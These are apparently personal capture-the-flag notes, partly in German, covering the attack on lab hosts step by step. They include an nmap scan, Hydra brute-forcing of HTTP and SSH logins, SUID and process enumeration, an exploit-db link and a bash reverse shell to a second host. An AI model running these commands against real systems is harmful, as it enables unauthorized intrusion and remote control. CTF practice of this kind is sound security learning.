itsi ctf

nmap 192.168.56.0/24 mit allen ports -T4 damit keine firewallfaxen python file für proof zeigen github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt https://tylerrockwell.github.io/defeating-basic-auth-with-hydra/ hydra -l user -P pw.txt -s 55487 -f 192.168.15.3 http-get / FLAG{use_secure_credentials}

ls -R *

hydra -l GrumpyCat -P pw.txt 192.168.15.3 ssh -t 4 find -perm -4000 2> /dev/null cat /proc/741/cmdline find -name "ctf_server.py" 2> /dev/null https://superuser.com/questions/632979/if-i-know-the-pid-number-of-a-process-how-can-i-get-its-name https://medium.com/techiepedia/series-of-ctf-machines-walkthrough-4-linux-privilege-escalation-enumeration-247899027be ls -R * 2>dev/null| grep -i flag cat /usr/local/bin/flag_process.sh https://www.exploit-db.com/exploits/42274

https://www.puckiestyle.nl/upgrading-netcat-shells-to-meterpreter-sessions/ bash -i> /dev/tcp/192.168.15.4/6969 0>&1 suid thing

find / -type f -perm -4001 -exec ls -h {} \; 2> /dev/null

1. credentials
2. comments
3. history
4. tmp
5. process
6. sudo
7. root